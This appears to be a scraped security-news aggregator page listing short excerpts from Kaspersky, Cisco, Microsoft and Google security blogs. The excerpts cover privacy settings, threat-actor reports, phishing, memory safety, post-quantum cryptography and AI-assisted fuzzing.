This story is nothing new: the problem of timing attacks has long been known to Tor representatives, to the world's intelligence agencies, and to academics.

Torrent programs often ignore proxy settings and prefer direct connections, thereby deanonymizing all traffic, including Tor.

2 weeks ago @ kaspersky.ru
Security and privacy settings in ASICS Runkeeper | Kaspersky Blog

The privacy settings in ASICS Runkeeper, as in other running apps for that matter, are in a not entirely obvious place.

Instead, tap the Me button in the bottom left corner, then tap the gear icon in the top right corner and select Privacy Settings on the page that opens.

It also does not hurt to configure the types of notifications ASICS Runkeeper may send you (and there are a great many of them in the settings): to do this, go back to Settings and select Push notifications.

This can be done under Settings → Account settings → Delete my data.

And do not forget to subscribe to our blog so as not to miss other guides and useful articles and always stay half a lap ahead of the scam…

2 weeks, 1 day ago @ kaspersky.ru
Improvements to our SIEM system in Q3 2024 | Kaspersky Blog

The earlier attackers' actions come to the attention of security solutions and experts, the more effectively the damage can be minimized or even prevented altogether.

For example, our May report on exploits and vulnerabilities describes the CVE-2024-21626 vulnerability, whose exploitation allows an escape from a container.

This was done using detection rules R231, R433 and R434, which are already available to KUMA SIEM users through the rule update system.

Taking the update described above into account, the platform now offers more than 659 rules, 525 of which contain detection logic proper.

You will be able to read about other improvements to our SIEM system in future posts.

2 weeks, 5 days ago @ kaspersky.ru
New requirements for password strength and storage

Moreover, the fresh document, which has gone through four rounds of public revisions with industry experts, reflects the modern view of identification and authentication processes, including security and privacy requirements, and takes a possible distributed (federated) approach to these processes into account.

The standard is practical and takes the human factor into account, that is, how users react to particular authentication requirements.

The new edition of the standard formalizes the concepts and describes requirements for: passkeys (called syncable authenticators in the standard); phishing-resistant authentication; user stores of passwords and credentials, or wallets (attribute bundles); regular reauthenti…

2 weeks, 6 days ago @ kaspersky.ru
How to keep track of your subscriptions and save money | Kaspersky Blog

And according to statistics*, subscribers in developed countries spend an amount on subscriptions each year comparable to an average monthly salary.

The thing is that the average cost of a single subscription in the USA, Germany and the UK ($12 per month) is as much as three times the average cost of a subscription in Russia ($4).

On different devices, the same service ends up with different accounts, and you have to pay for each of them.

If nothing turns up, a Google site search will help; just make sure you are buying official software from the official site and not malware from a fake one.

It tracks various special offers and promo codes, and with its help you can save noticeably when renewing a subscription.

3 weeks ago @ kaspersky.ru
A backdoor in a developer test assignment on GitHub | Kaspersky Blog

In the case of IT specialists, such an approach can often be an offer of a well-paid job at a prestigious company.

Hackers have been actively using fake job openings to hunt IT specialists for several years now, and in a number of cases have achieved truly resounding success.

In another scenario, the attackers, posing as recruiters, likewise initiate communication with the victim on LinkedIn, but then smoothly move the conversation over to WhatsApp.

However, unlike previous variations of the scheme, instead of sending the file directly, the developer is sent to fetch it from a repository on GitHub.

As in other variations of this scheme, the attackers are betting that the victim goes through the “interview” on their work computer and…

3 weeks, 1 day ago @ kaspersky.ru
How to spy on Kia car owners over the Internet | Kaspersky Blog

A group of security researchers discovered a serious vulnerability in a web portal belonging to South Korean automaker Kia that allowed cars to be hacked remotely and their owners to be tracked.

Overly connected cars

Not everyone thinks about it, but over the past couple of decades cars have been turned into very large computers on wheels.

As a result, the attacker gained access to functions that, properly speaking, even car dealers should not have, at least once the car has been handed over to the buyer.

The researchers took a responsible approach to disclosing the vulnerability: they notified the automaker about the problem they found and published their work…

3 weeks, 2 days ago @ kaspersky.ru
Group-IB Blog
last post None
Cisco Security Blog
last post 18 hours ago
Quantum Cryptography: What’s Coming Next

Incorporating PQC algorithms into transport protocols

To accommodate the new algorithms, it will be necessary to create new, or modify existing, transport protocols.

Making hardware quantum safe will therefore mean updating a variety of hardware components and functions that rely on cryptography.

For example, the Unified Extensible Firmware Interface (UEFI) needs to be adapted so it can handle PQC algorithms and keys.

PQC hardware availability

Cisco has offered quantum-safe hardware since 2013.

New quantum-safe editions of Secure Boot and Cisco Trust Anchor Technologies will be coming out soon, implementing the new NIST PQC standards.

18 hours ago @ blogs.cisco.com
Happy Third Birthday to Secure MSP Center

It is hard to believe that this November, we will be celebrating the third anniversary of the launch of Secure MSP Center.

We have come a long way from having MSPs buy single products to offering a streamlined, comprehensive program and dashboard for MSPs through Secure MSP Center and MSP Hub.

We took this feedback to heart and built Secure MSP Center.

You can learn more about the benefits of this dashboard from my previous blog: Up your Quality of Life with Secure MSP Hub and Secure MSP Center.

To learn more visit Secure MSP Center or email us at MSP Sales.

18 hours ago @ blogs.cisco.com
Reducing Help Desk Tickets With Cisco’s User Protection Suite

While there are many benefits of help desk tickets, there are also hidden costs.

How to reduce help desk tickets

One way to reduce help desk tickets is to implement technology solutions that make access easy for end users.

By improving the user experience for remote access, this proactively reduces the number of help desk tickets created.

Impact of User Protection Suite tools

Customers who are using Cisco’s User Protection Suite tools have seen the positive impact: fewer help desk tickets and less burden on the IT team.

Overall, help desk tickets are an important tool to enable organizations to operate.

1 day, 18 hours ago @ blogs.cisco.com
Business Leader’s Guide for a Successful Microsegmentation Project

Here’s how to ensure your microsegmentation project is a success, without getting lost in the technical details.

Microsegmentation is a long-term investment in your organization’s security, providing not only protection today but also adaptability for tomorrow’s challenges.

Gathering the ingredients: Preparation is key

A successful microsegmentation project requires more than just your IT or security department — it needs a cross-functional team.

For this initiative to truly work, the project team must include voices from across the organization: IT, security, application owners, key business leaders and project sponsors.

This knowledge, held by teams across the business, is critical to a su…

2 days, 18 hours ago @ blogs.cisco.com
Robust Intelligence, Now Part of Cisco, Recognized as a 2024 Gartner® Cool Vendor™ for AI Security

Cisco is excited to share that Robust Intelligence, a recently acquired AI security startup, has been mentioned in the first ever 2024 Gartner Cool Vendors for AI Security report.

The responsibility of AI security is shared by those developing AI applications and the security and governance teams protecting sensitive data at an organizational level.

As a pioneer in this space, Robust Intelligence introduced the first-ever AI Firewall to the market as part of their comprehensive AI security platform.

Robust Intelligence continues to be at the forefront of AI security innovation, from creating the industry’s first AI Firewall to conducting breakthrough AI research.

Gartner, Cool Vendors for A…

1 week, 2 days ago @ blogs.cisco.com
Converge Your WAN and Security With Cisco Firewall

Cisco Secure Firewall is an exceptionally robust firewall solution with innovative features such as Snort IPS, URL filtering, and malware defense.

However, organizations can overcome these challenges by leveraging a secure firewall solution for simplified and secure branch deployment.

The management center integrates with the Cisco Security Cloud and Cisco Defense Orchestrator (CDO) for this functionality.

More details about the templates can be found here: Zero touch provisioning with Cisco Firewall Management Center Templates – Cisco Blogs.

1 week, 5 days ago @ blogs.cisco.com
Leveraging Threat Intelligence in Cisco Secure Network Analytics, Part 2

In this part, we cover leveraging public Cisco Talos blogs and third-party threat intelligence data with Cisco Secure Network Analytics.

Cisco Talos Blogs

The talented researchers at Cisco Talos regularly publish blogs on threats and vulnerabilities.

We can use these blogs and GitHub files to build Custom Security Events in Cisco Secure Network Analytics.

They work the same way we handled internal threat intelligence in the first part of this blog or Cisco Talos blogs shown above.

Host group parent/child relationships

A good practice for building parent and child host groups is to create a new parent host group for any distinct sources.

1 week, 5 days ago @ blogs.cisco.com
NetSecOPEN: Cisco Firewall Outperforms Competition in Real-World Testing

The NetSecOPEN report confirms the advanced security capabilities of Cisco Secure Firewall, with 98% threat efficacy, 100% detection for evasive threats, and 100% block rate under heavy load conditions.

In testing, with its cutting-edge FPGA design, Cisco Secure Firewall 3105 maintained an impressive 4.17 Gbps throughput.

With Cisco Secure Firewall, businesses can confidently enable advanced security features without compromising speed.

Cisco Secure Firewall empowers you to face the future without trade-offs, offering seamless protection today and tomorrow.

We have verified what Cisco Secure Firewall has steadily offered: industry-leading protection with effective speed while closing securi…

1 week, 6 days ago @ blogs.cisco.com
Overview of Cybersecurity Regulations in the Middle East Region, Part 1

The Middle East region is quickly emerging as a new, dynamic player in the world of cybersecurity regulations.

State of Qatar

The State of Qatar’s cybersecurity regulatory framework consists of legislation, international standards and strategy guidelines placed within various cybersecurity frameworks, introduced across different strategic and business sectors.

It also includes strategies focused on setting up a collaborative environment aimed at building and cultivating national cybersecurity capabilities.

As part of the National Cybersecurity Strategy (NCS), the National Cybersecurity Authority (NCA) was established in 2017 to regulate and improve the cybersecurity landscape in the KSA wit…

2 weeks, 2 days ago @ blogs.cisco.com
Trust Through Transparency: Regulation’s Role in Consumer Confidence

For the past six years, Cisco has been studying consumer sentiment across the privacy landscape and the evolution of privacy from a compliance matter to a consumer requirement.

Growing regulatory awareness fosters consumer confidence
There are now more than 160 countries with national or multinational privacy laws in place.

With the strong correlation between regulatory awareness and consumer confidence, transparency can be a differentiator when it comes to customer trust.

Transparency as a driver of trust in the AI era
This consumer awareness coincides with the rapid advancement of Generative AI (Gen AI).

Explore these trends and more in the Cisco 2024 Consumer Privacy Survey.

3 weeks ago @ blogs.cisco.com
SOC Findings Report From RSA Conference 2024

Discover key insights from the SOC Findings Report at RSA Conference 2024, co-released by Cisco and NetWitness for Cybersecurity Awareness Month.

4 weeks, 1 day ago @ feedpress.me
Quality is Priority Zero, Especially for Security

Security software can be the first line of defense or the last, and the cost of failure is catastrophic. That's why quality is priority zero for Cisco.

1 month ago @ feedpress.me
You’ve Heard the Security Service Edge (SSE) Story Before, but We Re-Wrote It!

Built-in security: QUIC integrates Transport Layer Security (TLS) to provide encrypted connections by default, improving both privacy and security.

Reimagining Zero Trust: Powering a secure, in-office experience, for an anywhere workplace
Zero Trust Access by Cisco is easily available via our User Protection Suite licensing, which includes Cisco Secure Access.

With the industry-leading technologies outlined in this blog post and an identity-first approach, Cisco Zero Trust Access (and Cisco Secure Access) provides an easy-to-manage and deploy SSE platform.

Discover more about Cisco Zero Trust Access, and how it can transform your security approach, by registering for an upcoming workshop or …

1 month ago @ blogs.cisco.com
Cisco’s Firewall Solution Recognized as a Leader in Forrester Wave™

After a rigorous evaluation of 10 firewall solution vendors, Cisco was named a Leader in The Forrester Wave™: Enterprise Firewall Solutions, Q4 2024 report.

Reading the report, Forrester noted the following in Cisco’s vendor profile that we are particularly proud of.

Cisco: The only Enterprise Firewall Solutions leader to also be named a leader in The Forrester Wave™: Microsegmentation Solutions, Q3 2024
While we are incredibly excited to be named a Leader in Enterprise Firewall Solutions, we are equally ecstatic about what we feel this says about how we are addressing segmentation holistically.

Or, learn more about Cisco’s firewall and other security solutions.

Cisco Security Social Channel…

1 month ago @ blogs.cisco.com
Secure Team Collaboration in EKS with Gatekeeper

Enter Gatekeeper — a powerful tool designed to manage and implement policies across your EKS clusters, making cross-functional collaboration secure and efficient.

Policy as Code: With Gatekeeper, policies are managed as code, making them version-controlled and auditable.

Using Kubernetes namespaces and Gatekeeper policies, each BU can operate independently within its environment, all while sharing the same EKS infrastructure.

Restricted Access: Gatekeeper policies restrict access between namespaces.

Gatekeeper Policy Enforcement: Gatekeeper policies enforce access control and ensure that operations are restricted to the appropriate namespace.

1 month ago @ blogs.cisco.com
Microsoft Security
latest post 1 day, 18 hours ago
AI innovations for a more secure future unveiled at Microsoft Ignite

Company delivers advances in AI and posture management, unprecedented bug bounty program, and updates on its Secure Future Initiative.

1 day, 18 hours ago @ microsoft.com
Microsoft Data Security Index annual report highlights evolving generative AI security needs

84% of surveyed organizations want to feel more confident about managing and discovering data input into AI apps and tools.

1 week ago @ microsoft.com
DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration

As part of the department’s ongoing assessments of zero trust implementation, Flank Speed just underwent its second round of security assessments sponsored by the DoD Zero Trust Portfolio Management Office (PfMO)—with tremendous results.

DoD Zero Trust Report
The United States Navy is proving that Zero Trust goes beyond compliance standards and has become a proven security methodology with real-world results.

The DoD expanded beyond traditional penetration testing to thoroughly evaluate all 152 zero trust activities.

This comprehensive and extensible zero trust platform supports a range of environments including hybrid cloud, multicloud, and multiplatform needs.

Also, follow us on LinkedIn …

1 week, 2 days ago @ microsoft.com
More value, less risk: How to implement generative AI across the organization securely and responsibly

To maximize the advantages of generative AI, we need to strike a balance between addressing the potential risks and embracing innovation.

In our recent strategy paper, “Minimize Risk and Reap the Benefits of AI,” we provide a comprehensive guide to navigating the challenges and opportunities of using generative AI.

We offer best practices for aligning AI initiatives with legal and ethical standards, including establishing ethics committees and leveraging frameworks like the NIST AI Risk Management Framework.

Explore concrete actions for the future
As your organization adopts generative AI, it’s critical to implement responsible AI principles—including fairness, reliability, safety, privacy, …

1 week, 6 days ago @ microsoft.com
Zero Trust Workshop: Advance your knowledge with an online resource

Zero Trust Workshop
A comprehensive technical guide to help customers and partners adopt a Zero Trust strategy and deploy security solutions end-to-end to secure their organizations.

The Zero Trust Workshop is a great starting point for our customers who want to embrace Zero Trust principles, but don’t know how to align the technology they already own.

The Zero Trust Strategy workshop: This is a guided breakdown of the Zero Trust areas according to the standard Zero Trust pillars (Identity, Devices, Data, Network, Infrastructure and Application, and Security Operations).

I invite you to check out the Zero Trust Workshop site where we have detailed training videos and content.

Additional res…

2 weeks ago @ microsoft.com
How Microsoft Defender for Office 365 innovated to address QR code phishing attacks

Unique characteristics of QR code phishing campaigns
Security 101: What is phishing?

As with other phishing techniques, the goal of QR code phishing attacks is to get the user to click on a malicious link that seems legitimate.

The necessity of innovation in QR code phishing defense
Innovation in the face of evolving QR code phishing risk is not just beneficial, it’s imperative.

In response to the growing threat of QR code phishing, Microsoft Defender for Office 365 took decisive action to leverage advanced machine learning and AI—developing robust defenses capable of detecting and neutralizing QR code phishing attacks in real time.

QR code phishing blocked by Microsoft Defender f…

2 weeks, 2 days ago @ microsoft.com
Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network

Microsoft assesses that credentials acquired from CovertNetwork-1658 password spray operations are used by multiple Chinese threat actors.

Microsoft assesses that multiple Chinese threat actors use the credentials acquired from CovertNetwork-1658 password spray operations to perform computer network exploitation (CNE) activities.

Steps taken to prepare the router for password spray operations
CovertNetwork-1658 is observed conducting its password spray campaigns through this proxy network to ensure the password spray attempts originate from the compromised devices.

Password spray activity from CovertNetwork-1658 infrastructure
Microsoft has observed multiple password spray campaigns origina…

2 weeks, 6 days ago @ microsoft.com
Microsoft now a Leader in three major analyst reports for SIEM

Microsoft is positioned in the Leaders Category in the 2024 IDC MarketScape for worldwide SIEM for Enterprise—making it the third major analyst report in SIEM to name Microsoft as a Leader.

2 weeks, 6 days ago @ techcommunity.microsoft.com
Microsoft now a Leader in three major analyst reports for SIEM

2 weeks, 6 days ago @ techcommunity.microsoft.com
7 cybersecurity trends and tips for small and medium businesses to stay protected

As October draws to a close, marking 21 years of Cybersecurity Awareness Month, cyberattacks continue to be a challenge for businesses of all sizes; however, small and medium businesses (SMBs) face distinct challenges when it comes to cybersecurity.

Microsoft, in collaboration with the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCA), has outlined four simple best practices to create a strong cybersecurity foundation.

These assessments can help SMBs uncover areas open to attack to minimize them, ensure compliance with regulatory requirements, establish incident response plans, and more.

94% consider cybersecurity critical to their busine…

2 weeks, 6 days ago @ microsoft.com
Microsoft Ignite: Sessions and demos to improve your security strategy

The way to win is with AI-first, end-to-end security—a key focus for Microsoft Security at Microsoft Ignite, November 18 to 22, 2024.

And be sure to register for the digital experience to explore the Microsoft Security sessions at Microsoft Ignite.

If you’re already attending in person, log in to your Microsoft Ignite registration and add on the Microsoft Security Ignite Forum.

Plus, you can take your security knowledge further at Tech Community Live: Microsoft Security edition on December 3, 2024, to ask all your follow-up questions from Microsoft Ignite.

3 weeks ago @ microsoft.com
Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files

Since October 22, 2024, Microsoft Threat Intelligence has observed Russian threat actor Midnight Blizzard sending a series of highly targeted spear-phishing emails to individuals in government, academia, defense, non-governmental organizations, and other sectors. This activity is ongoing, and Microsoft will continue to investigate and provide updates as available. Based on our investigation of previous Midnight […]

3 weeks, 1 day ago @ microsoft.com
Microsoft Threat Intelligence healthcare ransomware report highlights need for collective industry action

Healthcare organizations are an attractive target for ransomware attacks. Read our latest blog post to learn why and get strategies to protect yourself from cyberthreats.

4 weeks, 1 day ago @ microsoft.com
New macOS vulnerability, “HM Surf”, could lead to unauthorized data access

The most important part that usually requires TCC camera access is:
Figure 3.

Note how TCC access for Camera is not permitted, and Safari-specific controls do not automatically allow Camera access:
Figure 5.

Google Chrome first asking TCC access to the microphone via a “true” TCC popup that works at the app level.

References
Jonathan Bar Or, Microsoft Threat Intelligence
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threa…

1 month ago @ microsoft.com
Escalating cyber threats demand stronger global defense and cooperation

Specifically:
Russian threat actors appear to have outsourced some of their cyberespionage operations to criminal groups, especially operations targeting Ukraine.

Iranian nation-state actors used ransomware in a cyber-enabled influence operation, marketing stolen Israeli dating website data.

We believe these domains are examples both of cybercriminal activity driven by profit and of reconnaissance by nation-state threat actors in pursuit of political goals.

Financially motivated cybercrime and fraud remain a persistent threat
While nation-state attacks continue to be a concern, so are financially motivated cyberattacks.

However, those norms so far lack meaningful consequence for their violati…

1 month ago @ blogs.microsoft.com
Google Online Security Blog
latest post 14 hours ago
Leveling Up Fuzzing: Finding more vulnerabilities with AI

But these particular vulnerabilities represent a milestone for automated vulnerability finding: each was found with AI, using AI-generated and enhanced fuzz targets.

The ideal solution would be to completely automate the manual process of developing a fuzz target end to end:
Drafting an initial fuzz target.

Running the corrected fuzz target for a longer period of time, and triaging any crashes to determine the root cause.

In January 2024, we open sourced the framework that we were building to enable an LLM to generate fuzz targets.

New results: More code coverage and discovered vulnerabilities
We’re now able to automatically gain more coverage in 272 C/C++ projects on OSS-Fuzz (up from 160), …

14 hours ago @ security.googleblog.com
Retrofitting Spatial Safety to hundreds of millions of lines of C++

Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade:
Breakdown of memory safety CVEs exploited in the wild by vulnerability class
Google is taking a comprehensive approach to memory safety.

This leads to an exponential decline in memory safety vulnerabilities and quickly improves the overall security posture of a codebase, as demonstrated by our post about Android's journey to memory safety.

We’ve begun by enabling hardened libc++, which adds bounds checking to standard C++ data structures, eliminating a significant class of spatial safety bugs.

This improves spat…

5 days, 14 hours ago @ security.googleblog.com
Safer with Google: New intelligent, real-time protections on Android to keep you safe

That’s why we’re using the best of Google AI to identify and stop scams before they can do harm with Scam Detection.

Scam Detection is off by default, and you can decide whether you want to activate it for future calls.

Cutting-edge AI protection, now on more Pixel phones: Gemini Nano, our advanced on-device AI model, powers Scam Detection on Pixel 9 series devices.

We look forward to learning from this beta and your feedback, and we’ll share more about Scam Detection in the months ahead.

1 week ago @ security.googleblog.com
5 new protections on Google Messages to help keep you safe

Every day, over a billion people use Google Messages to communicate.

That’s why we’ve made security a top priority, building in powerful on-device, AI-powered filters and advanced security that protects users from 2 billion suspicious messages a month.

With end-to-end encrypted1 RCS conversations, you can communicate privately with other Google Messages RCS users.

We're committed to constantly developing new controls and features to make your conversations on Google Messages even more secure and private.

As part of cybersecurity awareness month, we're sharing five new protections to help keep you safe while using Google Messages on Android:

4 weeks, 1 day ago @ security.googleblog.com
Safer with Google: Advancing Memory Safety

Our internal analysis estimates that 75% of CVEs used in zero-day exploits are memory safety vulnerabilities.

Our Secure by Design commitment emphasizes integrating security considerations, including robust memory safety practices, throughout the entire software development lifecycle.

This post builds upon our previously reported Perspective on Memory Safety, and introduces our strategic approach to memory safety.

By open-sourcing these tools, we've empowered developers worldwide to reduce the likelihood of memory safety vulnerabilities in C and C++ codebases.

Migration to Memory-Safe Languages (MSLs)
The first pillar of our strategy is centered on further increasing the adoption of memory-s…

1 month ago @ security.googleblog.com
Bringing new theft protection features to Android users around the world

Situations like Janine’s highlighted the need for a comprehensive solution to phone theft that exceeded existing tools on any platform.

These advanced theft protection features are now available to users around the world through Android 15 and a Google Play Services update (Android 10+ devices).

These theft protection features are just one example of how Android is working to provide real-world protection for everyone.

You can turn on the new Android theft features by clicking here on a supported Android device.

Learn more about our theft protection features by visiting our help center.

1 month ago @ security.googleblog.com
Using Chrome's accessibility APIs to find security bugs

If only the whole tree of Chrome UI controls were exposed, somehow, such that we could enumerate and interact with each UI control automatically.

We need to amortize that cost over thousands of test cases by running a batch of them within each browser invocation.

Yet this is tricky, since Chrome UI controls are deeply nested and often anonymous.

This approach has proven to be about 80% as quick as the original ordinal-based mutator, while providing stable test cases.

If you’d like to follow along, keep an eye on our coverage dashboard as it expands to cover UI code.

1 month, 1 week ago @ security.googleblog.com
Pixel's Proactive Approach to Security: Addressing Vulnerabilities in Cellular Modems

Most smartphones use cellular baseband processors with tight performance constraints, making security hardening difficult.

The Cellular Baseband
The cellular baseband within a smartphone is responsible for managing the device's connectivity to cellular networks.

The firmware within the cellular baseband, similar to any software, is susceptible to bugs and errors.

For example, 0-day exploits in the cellular baseband are being used to deploy the Predator malware in smartphones.

Pixel's proactive approach to security demonstrates a commitment to protecting its users across the entire software stack.

1 month, 2 weeks ago @ security.googleblog.com
Evaluating Mitigations & Vulnerabilities in Chrome

The Chrome Security Team is constantly striving to make it safer to browse the web.

We invest in mechanisms to make classes of security bugs impossible, mitigations that make it more difficult to exploit a security bug, and sandboxing to reduce the capability exposed by an isolated security issue.

Historically the Chrome Security Team has made major investments and driven the web to be safer.

In the longer-term the Chrome Security Team advocates for operating system improvements like less-capable lightweight processes, less-privileged GPU and NPU containers, improved application isolation, and support for hardware-based isolation, memory safety and flow control enforcement.

Good Bugs and Ba…

1 month, 2 weeks ago @ security.googleblog.com
Eliminating Memory Safety Vulnerabilities at the Source

Memory safety vulnerabilities remain a pervasive threat to software security.

We’ll also share updated data on how the percentage of memory safety vulnerabilities in Android dropped from 76% to 24% over 6 years as development shifted to memory safe languages.

This decision was driven by the increasing cost and complexity of managing memory safety vulnerabilities.

We first reported this decline in 2022, and we continue to see the total number of memory safety vulnerabilities dropping3.

As the number of memory safety vulnerabilities has dropped, the overall security risk has dropped along with it.

1 month, 3 weeks ago @ security.googleblog.com
Google & Arm - Raising The Bar on GPU Security

Arm Product Security and GPU Teams
Arm has a central product security team that sets the policy and practice across the company.

Working together to secure Android devices
Google’s Android Security teams and Arm have been working together for a long time.

So “application ⇒ kernel ⇒ firmware ⇒ kernel” is a known attack flow in this area.

The Arm Product Security Team is actively involved in security-focused industry communities and collaborates closely with its ecosystem partners.

The Android Red Team and Arm continue to work together to proactively raise the bar on GPU security.

1 month, 3 weeks ago @ security.googleblog.com
A new path for Kyber on the web

We previously posted about experimenting with a hybrid post-quantum key exchange, and enabling it for 100% of Chrome Desktop clients.

The hybrid key exchange used both the pre-quantum X25519 algorithm, and the new post-quantum algorithm Kyber.

As a result, the codepoint in TLS for hybrid post-quantum key exchange is changing from 0x6399 for Kyber768+X25519, to 0x11EC for ML-KEM768+X25519.

Post-quantum key shares are too large for a client to offer two post-quantum key share predictions at the same time.

Longer term, we hope to avoid the chicken-and-egg problem for post-quantum key share predictions through our emerging IETF draft for key share prediction.

2 months, 1 week ago @ security.googleblog.com
Deploying Rust in Existing Firmware Codebases

The Android team has discussed Rust for bare-metal firmware previously, and has developed training specifically for this domain.

The shim serves as a wrapper around the Rust library API, bridging the existing C API and the Rust API.

Choosing a Pre-Existing Crate (Rust Library)
Picking the right open-source crate (Rust library) to replace the chosen component is crucial.

[no_std]
#[cfg(feature = "std")] extern crate std;
extern crate alloc;
Then, iteratively fix all occurring compiler errors as follows:
Move any use directives from std to either core or alloc.

Memory Safety for Firmware, Today
Using the process outlined in this blog post, you can begin to introduce Rust into large legacy firmware…

2 months, 2 weeks ago @ security.googleblog.com
Private AI For All: Our End-To-End Approach to AI Privacy on Android

As a pioneer in responsible AI and cutting-edge privacy technologies like Private Compute Core and federated learning, we made sure our approach to the assistant experience with Gemini on Android is aligned with our existing Secure AI framework, AI Principles and Privacy Principles.

From privacy on-device when handling sensitive data to the world’s best cloud infrastructure, here are six key ways we keep your information private and protected.

For some AI features, like Summarize in Recorder on Pixel, that benefit from additional data privacy or processing efficiency, we utilize on-device AI.

It can be thought of as extending the user’s device and its security boundaries into our cloud infr…

3 months, 1 week ago @ security.googleblog.com
Post-Quantum Cryptography: Standards and Progress

The National Institute of Standards and Technology (NIST) just released three finalized standards for post-quantum cryptography (PQC) covering public key encapsulation and two forms of digital signatures.

Here's a brief overview of what PQC is, how Google is using PQC, and how other organizations can adopt these new standards.

Practical large-scale quantum computers are still years away, but computer scientists have known for decades that a cryptographically relevant quantum computer (CRQC) could break existing forms of asymmetric key cryptography.

Google began testing PQC in Chrome in 2016 and has been using PQC to protect internal communications since 2022.

As we make progress on our own …

3 months, 1 week ago @ security.googleblog.com